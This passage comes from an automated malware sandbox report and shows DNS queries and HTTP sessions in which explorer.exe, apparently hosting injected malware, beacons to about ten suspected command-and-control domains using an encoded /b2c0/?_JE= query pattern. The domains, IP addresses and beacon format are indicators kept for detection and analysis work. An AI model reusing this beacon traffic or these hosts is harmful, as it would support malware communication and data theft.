                                                                          Sep 21, 2021 02:20:50.393183947 CEST53530238.8.8.8192.168.2.3
                                                                          Sep 21, 2021 02:20:55.506264925 CEST4956353192.168.2.38.8.8.8
                                                                          Sep 21, 2021 02:20:55.531225920 CEST53495638.8.8.8192.168.2.3
                                                                          Sep 21, 2021 02:21:00.719315052 CEST5135253192.168.2.38.8.8.8
                                                                          Sep 21, 2021 02:21:00.864193916 CEST53513528.8.8.8192.168.2.3
                                                                          Sep 21, 2021 02:21:05.873550892 CEST5934953192.168.2.38.8.8.8
                                                                          Sep 21, 2021 02:21:05.993624926 CEST53593498.8.8.8192.168.2.3
                                                                          Sep 21, 2021 02:21:11.666320086 CEST5708453192.168.2.38.8.8.8
                                                                          Sep 21, 2021 02:21:11.701076031 CEST53570848.8.8.8192.168.2.3

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                          Sep 21, 2021 02:20:17.970813036 CEST192.168.2.38.8.8.80xcd4bStandard query (0)www.carts-amazon.comA (IP address)IN (0x0001)
                                                                          Sep 21, 2021 02:20:23.232652903 CEST192.168.2.38.8.8.80x538bStandard query (0)www.kutahyaescortbayanlarim.xyzA (IP address)IN (0x0001)
                                                                          Sep 21, 2021 02:20:28.748796940 CEST192.168.2.38.8.8.80x30d8Standard query (0)www.emilfaucets.comA (IP address)IN (0x0001)
                                                                          Sep 21, 2021 02:20:39.469809055 CEST192.168.2.38.8.8.80x4de9Standard query (0)www.sunshinefamilysupport.comA (IP address)IN (0x0001)
                                                                          Sep 21, 2021 02:20:44.869060993 CEST192.168.2.38.8.8.80x5696Standard query (0)www.invetorsbank.comA (IP address)IN (0x0001)
                                                                          Sep 21, 2021 02:20:49.968334913 CEST192.168.2.38.8.8.80x6816Standard query (0)www.loccssol.storeA (IP address)IN (0x0001)
                                                                          Sep 21, 2021 02:20:55.506264925 CEST192.168.2.38.8.8.80xc70aStandard query (0)www.brightlifeprochoice.comA (IP address)IN (0x0001)
                                                                          Sep 21, 2021 02:21:00.719315052 CEST192.168.2.38.8.8.80x9951Standard query (0)www.thesewhitevvalls.comA (IP address)IN (0x0001)
                                                                          Sep 21, 2021 02:21:05.873550892 CEST192.168.2.38.8.8.80x8e49Standard query (0)www.starsspell.comA (IP address)IN (0x0001)
                                                                          Sep 21, 2021 02:21:11.666320086 CEST192.168.2.38.8.8.80x9195Standard query (0)www.newstodayupdate.comA (IP address)IN (0x0001)

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                          Sep 21, 2021 02:20:18.003947973 CEST8.8.8.8192.168.2.30xcd4bNo error (0)www.carts-amazon.comcarts-amazon.comCNAME (Canonical name)IN (0x0001)
                                                                          Sep 21, 2021 02:20:18.003947973 CEST8.8.8.8192.168.2.30xcd4bNo error (0)carts-amazon.com34.102.136.180A (IP address)IN (0x0001)
                                                                          Sep 21, 2021 02:20:23.258923054 CEST8.8.8.8192.168.2.30x538bNo error (0)www.kutahyaescortbayanlarim.xyz104.21.2.184A (IP address)IN (0x0001)
                                                                          Sep 21, 2021 02:20:23.258923054 CEST8.8.8.8192.168.2.30x538bNo error (0)www.kutahyaescortbayanlarim.xyz172.67.129.140A (IP address)IN (0x0001)
                                                                          Sep 21, 2021 02:20:29.059885979 CEST8.8.8.8192.168.2.30x30d8No error (0)www.emilfaucets.com23.92.26.10A (IP address)IN (0x0001)
                                                                          Sep 21, 2021 02:20:39.494118929 CEST8.8.8.8192.168.2.30x4de9No error (0)www.sunshinefamilysupport.comsunshinefamilysupport.comCNAME (Canonical name)IN (0x0001)
                                                                          Sep 21, 2021 02:20:39.494118929 CEST8.8.8.8192.168.2.30x4de9No error (0)sunshinefamilysupport.com184.168.131.241A (IP address)IN (0x0001)
                                                                          Sep 21, 2021 02:20:44.894406080 CEST8.8.8.8192.168.2.30x5696No error (0)www.invetorsbank.com185.53.177.12A (IP address)IN (0x0001)
                                                                          Sep 21, 2021 02:20:50.393183947 CEST8.8.8.8192.168.2.30x6816No error (0)www.loccssol.storeconnect.shopbase.comCNAME (Canonical name)IN (0x0001)
                                                                          Sep 21, 2021 02:20:50.393183947 CEST8.8.8.8192.168.2.30x6816No error (0)connect.shopbase.com185.33.94.22A (IP address)IN (0x0001)
                                                                          Sep 21, 2021 02:20:50.393183947 CEST8.8.8.8192.168.2.30x6816No error (0)connect.shopbase.com185.33.94.234A (IP address)IN (0x0001)
                                                                          Sep 21, 2021 02:20:55.531225920 CEST8.8.8.8192.168.2.30xc70aNo error (0)www.brightlifeprochoice.com172.67.169.11A (IP address)IN (0x0001)
                                                                          Sep 21, 2021 02:20:55.531225920 CEST8.8.8.8192.168.2.30xc70aNo error (0)www.brightlifeprochoice.com104.21.27.72A (IP address)IN (0x0001)
                                                                          Sep 21, 2021 02:21:00.864193916 CEST8.8.8.8192.168.2.30x9951Name error (3)www.thesewhitevvalls.comnonenoneA (IP address)IN (0x0001)
                                                                          Sep 21, 2021 02:21:05.993624926 CEST8.8.8.8192.168.2.30x8e49No error (0)www.starsspell.comstarsspell.comCNAME (Canonical name)IN (0x0001)
                                                                          Sep 21, 2021 02:21:05.993624926 CEST8.8.8.8192.168.2.30x8e49No error (0)starsspell.com70.40.216.229A (IP address)IN (0x0001)
                                                                          Sep 21, 2021 02:21:11.701076031 CEST8.8.8.8192.168.2.30x9195No error (0)www.newstodayupdate.comnewstodayupdate.comCNAME (Canonical name)IN (0x0001)
                                                                          Sep 21, 2021 02:21:11.701076031 CEST8.8.8.8192.168.2.30x9195No error (0)newstodayupdate.com34.102.136.180A (IP address)IN (0x0001)

                                                                          HTTP Request Dependency Graph

                                                                          • www.carts-amazon.com
                                                                          • www.kutahyaescortbayanlarim.xyz
                                                                          • www.emilfaucets.com
                                                                          • www.sunshinefamilysupport.com
                                                                          • www.invetorsbank.com
                                                                          • www.loccssol.store
                                                                          • www.brightlifeprochoice.com
                                                                          • www.starsspell.com
                                                                          • www.newstodayupdate.com

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          0192.168.2.34976734.102.136.18080C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Sep 21, 2021 02:20:18.048001051 CEST6882OUTGET /b2c0/?_JE=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw++swUDkTm/7Z&-Z=9rjLOxDhNVLl4X HTTP/1.1
                                                                          Host: www.carts-amazon.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 21, 2021 02:20:18.215401888 CEST6882INHTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Tue, 21 Sep 2021 00:20:18 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "6139efaa-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          1192.168.2.349768104.21.2.18480C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Sep 21, 2021 02:20:23.281737089 CEST6883OUTGET /b2c0/?_JE=KWX9NFx1Gr7EjrLRbP2Ue6172ayjYXgbpVpgMDrQRkbxhVzMYie83xsGqGgpFAioWvz0&-Z=9rjLOxDhNVLl4X HTTP/1.1
                                                                          Host: www.kutahyaescortbayanlarim.xyz
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 21, 2021 02:20:23.731086969 CEST6884INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Sep 2021 00:20:23 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          x-powered-by: PHP/7.3.24
                                                                          set-cookie: PHPSESSID=226b47b2a8a5769a54cb3424142a9526; path=/
                                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          cache-control: no-store, no-cache, must-revalidate
                                                                          pragma: no-cache
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b8HFJx1aVV9arzA3%2BirsgDjQ1PN%2F8CXAqg3X4oJI9wx04LOYS2k3jGoP5K5qKMmXI3N85RpgnSVC3RqnwfG3BqFTFtFKhrolceT5hZ1%2Fd4jN4XLAkdyNeeNCRqqdd7YsWXEl2rnDsA1FnKdRCFjf%2F5TD"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 691f209d9da14ec8-FRA
                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          2192.168.2.34976923.92.26.1080C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Sep 21, 2021 02:20:29.238538980 CEST6885OUTGET /b2c0/?_JE=Vx4H34AfvC8+5ufWQT1ywEaqK5CQ+nmgdM61680UbYEpJUiUIyjnXiODPkc5gWJA3z4C&-Z=9rjLOxDhNVLl4X HTTP/1.1
                                                                          Host: www.emilfaucets.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 21, 2021 02:20:29.414244890 CEST6885INHTTP/1.1 301 Moved Permanently
                                                                          Server: nginx/1.14.2
                                                                          Date: Tue, 21 Sep 2021 00:20:29 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 185
                                                                          Connection: close
                                                                          Location: https://www.emilfaucets.com/b2c0/?_JE=Vx4H34AfvC8+5ufWQT1ywEaqK5CQ+nmgdM61680UbYEpJUiUIyjnXiODPkc5gWJA3z4C&-Z=9rjLOxDhNVLl4X
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          3192.168.2.349770184.168.131.24180C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Sep 21, 2021 02:20:39.666773081 CEST6887OUTGET /b2c0/?_JE=OHhY/R7K/8h4MegcVZK1Xj4hyqShMd99eYdWuTQY8l2Zovp1jXuaaoSrFKSMy8PCBLbw&-Z=9rjLOxDhNVLl4X HTTP/1.1
                                                                          Host: www.sunshinefamilysupport.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 21, 2021 02:20:39.861923933 CEST6887INHTTP/1.1 301 Moved Permanently
                                                                          Server: nginx/1.20.1
                                                                          Date: Tue, 21 Sep 2021 00:20:39 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Location: http://www.sunshinefamilysupport.com.au/b2c0/?_JE=OHhY/R7K/8h4MegcVZK1Xj4hyqShMd99eYdWuTQY8l2Zovp1jXuaaoSrFKSMy8PCBLbw&-Z=9rjLOxDhNVLl4X
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          4192.168.2.349771185.53.177.1280C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Sep 21, 2021 02:20:44.929759979 CEST6888OUTGET /b2c0/?_JE=uqZnad07QiGCKwdGYcwo9Lbmnd7wjNT/WYKGRVhSVOqBK78kk4TDY1HvjRJsoD1gaAbq&-Z=9rjLOxDhNVLl4X HTTP/1.1
                                                                          Host: www.invetorsbank.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 21, 2021 02:20:44.946695089 CEST6889INHTTP/1.1 403 Forbidden
                                                                          Server: nginx
                                                                          Date: Tue, 21 Sep 2021 00:20:44 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 146
                                                                          Connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          5192.168.2.349784185.33.94.2280C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Sep 21, 2021 02:20:50.413014889 CEST6927OUTGET /b2c0/?_JE=T/FvhneI6kXhrarG8DZpDikOenyRImYajqrPlFumj7GB2BrAWwUdaa1CHdljUEylHeGw&-Z=9rjLOxDhNVLl4X HTTP/1.1
                                                                          Host: www.loccssol.store
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 21, 2021 02:20:50.462430000 CEST6928INHTTP/1.1 403 Forbidden
                                                                          Date: Tue, 21 Sep 2021 00:20:50 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          CF-Chl-Bypass: 1
                                                                          Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                          Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          Set-Cookie: __cf_bm=4OZpWhQLK46upX7OUaTQ1YthCz0.KCHf.7FzqFihlP0-1632183650-0-AZtSc5qNi89UiZKgE+UNKKWxtcE5S83zE/Uw7yrFzu0Epbv6HqDLZZ1SvYC8SXXO8+weQKYYghMThOUaOn8o5Sg=; path=/; expires=Tue, 21-Sep-21 00:50:50 GMT; domain=.www.loccssol.store; HttpOnly
                                                                          Server: cloudflare
                                                                          CF-RAY: 691f214729a14303-FRA
                                                                          Data Raw: 32 62 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 61 70 74 63 68 61 2d 62 79 70 61 73 73 22 20 69 64 3d 22 63 61 70 74 63 68 61 2d
                                                                          Data Ascii: 2bd4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta name="captcha-bypass" id="captcha-
                                                                          Sep 21, 2021 02:20:50.462472916 CEST6930INData Raw: 62 79 70 61 73 73 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f
                                                                          Data Ascii: bypass" /><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
                                                                          Sep 21, 2021 02:20:50.462511063 CEST6931INData Raw: 45 5a 31 62 57 6f 33 52 30 49 79 51 6e 4a 42 56 33 64 56 5a 47 46 68 4d 55 4e 49 5a 47 78 71 56 55 56 35 62 45 68 6c 52 33 63 6d 4c 56 6f 39 4f 58 4a 71 54 45 39 34 52 47 68 4f 56 6b 78 73 4e 46 67 3d 22 2c 0a 20 20 20 20 20 20 20 20 20 20 72 61
                                                                          Data Ascii: EZ1bWo3R0IyQnJBV3dVZGFhMUNIZGxqVUV5bEhlR3cmLVo9OXJqTE94RGhOVkxsNFg=", ra: "", rm: "R0VU", d: "EWXn12CgRQ+eOL+N5dCH+nh4Z+Q+72HP0eZhanTY0QNK3Spz67cBxvd/ybRfG3eLiUdSAhpkiZXGJIvm3O3feMZjVbaxpNyhqKbKZwBiBX+e1PYaxsJ4DMA
                                                                          Sep 21, 2021 02:20:50.462555885 CEST6933INData Raw: 23 63 66 2d 77 72 61 70 70 65 72 20 23 63 66 2d 70 6c 65 61 73 65 2d 77 61 69 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 0a 20 20 2e 61 74 74 72 69 62 75 74 69 6f 6e 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 32 70 78 3b 7d 0a
                                                                          Data Ascii: #cf-wrapper #cf-please-wait{text-align:center} .attribution {margin-top: 32px;} .bubbles { background-color: #f58220; width:20px; height: 20px; margin:2px; border-radius:100%; display:inline-block; } #cf-wrapper #challenge-form { padding
                                                                          Sep 21, 2021 02:20:50.462614059 CEST6934INData Raw: 64 69 76 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 20 63 66 2d 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20
                                                                          Data Ascii: div> <div class="cf-section cf-highlight cf-captcha-container"> <div class="cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <div class="cf-highlight-invers
                                                                          Sep 21, 2021 02:20:50.462650061 CEST6935INData Raw: 34 5f 47 58 38 78 42 31 53 5f 74 38 42 41 65 64 45 31 45 2d 74 73 57 4b 67 63 42 50 36 6f 39 4f 42 68 61 4f 49 48 6e 67 7a 68 56 66 35 6a 5f 54 30 36 69 55 67 79 57 32 35 6f 59 32 4f 4a 45 53 69 54 32 51 75 61 73 7a 36 53 72 6b 59 2d 5a 58 70 63
                                                                          Data Ascii: 4_GX8xB1S_t8BAedE1E-tsWKgcBP6o9OBhaOIHngzhVf5j_T06iUgyW25oY2OJESiT2Quasz6SrkY-ZXpcmdw9ZRqIR_dI2GlxOsqFtsfIuF93YqWW7-VMaCXphDdUCd0y0ZBYj5tH9Nl-hC7LdljNkcbzUFJCiRukuh-9qzXkFFADhA-SlT2ooHlpnu_HifkULrVJXOW4zM47BiedUSRpyTbmUoqMESyeiWqD1hiAEynRPhjk0
                                                                          Sep 21, 2021 02:20:50.462690115 CEST6937INData Raw: 22 3e 0a 20 20 0a 20 20 3c 6e 6f 73 63 72 69 70 74 20 69 64 3d 22 63 66 2d 63 61 70 74 63 68 61 2d 62 6f 6f 6b 6d 61 72 6b 22 20 63 6c 61 73 73 3d 22 63 66 2d 63 61 70 74 63 68 61 2d 69 6e 66 6f 22 3e 0a 20 20 3c 68 31 20 64 61 74 61 2d 74 72 61
                                                                          Data Ascii: "> <noscript id="cf-captcha-bookmark" class="cf-captcha-info"> <h1 data-translate="turn_on_js" style="color:#bd2426;">Please turn JavaScript on and reload the page.</h1> </noscript> <div id="no-cookie-warning" class="cookie-warnin
                                                                          Sep 21, 2021 02:20:50.462728024 CEST6938INData Raw: 72 63 22 2c 20 22 2f 63 64 6e 2d 63 67 69 2f 69 6d 61 67 65 73 2f 74 72 61 63 65 2f 63 61 70 74 63 68 61 2f 6a 73 2f 74 72 61 6e 73 70 61 72 65 6e 74 2e 67 69 66 3f 72 61 79 3d 36 39 31 66 32 31 34 37 32 39 61 31 34 33 30 33 22 29 3b 0a 20 20 20
                                                                          Data Ascii: rc", "/cdn-cgi/images/trace/captcha/js/transparent.gif?ray=691f214729a14303"); trkjs.id = "trk_captcha_js"; trkjs.setAttribute("alt", ""); document.body.appendChild(trkjs); var cpo=document.createElement('script
                                                                          Sep 21, 2021 02:20:50.462776899 CEST6940INData Raw: 20 20 20 20 20 20 20 3c 70 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 72 65 73 6f 6c 76 65 5f 63 61 70 74 63 68 61 5f 61 6e 74 69 76 69 72 75 73 22 3e 49 66 20 79 6f 75 20 61 72 65 20 6f 6e 20 61 20 70 65 72 73 6f 6e 61 6c 20 63 6f 6e 6e
                                                                          Data Ascii: <p data-translate="resolve_captcha_antivirus">If you are on a personal connection, like at home, you can run an anti-virus scan on your device to make sure it is not infected with malware.</p> <p data-translate="resolve_cap
                                                                          Sep 21, 2021 02:20:50.462810040 CEST6940INData Raw: 69 76 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69
                                                                          Data Ascii: iv> <script type="text/javascript"> window._cf_translation = {}; </script></body></html>
                                                                          Sep 21, 2021 02:20:50.462836027 CEST6940INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          6192.168.2.349801172.67.169.1180C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Sep 21, 2021 02:20:55.550383091 CEST6981OUTGET /b2c0/?_JE=iqPHNlAuEp+rWkrFhaEt134F/UvnRG9uU2uGhWM6L7rkNLvrOy7oDxfHgSZWSk7NT09j&-Z=9rjLOxDhNVLl4X HTTP/1.1
                                                                          Host: www.brightlifeprochoice.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 21, 2021 02:20:55.697921038 CEST6982INHTTP/1.1 404 Not Found
                                                                          Date: Tue, 21 Sep 2021 00:20:55 GMT
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dallbwbbB0jG3QI%2FttpOEybBvqprjoPuNOtTsjrQcsjxHUo1%2BvUmm9DaZAAKmupQffulU4Vs%2BQDOCjdHDaYj%2B2wmEVe7Y9qZkCGHCRK4NG7pd4nuryOOQJSCr8TL9nmuiugD9crgI62gedrQXBY%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 691f21673fcf699f-FRA
                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                          Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
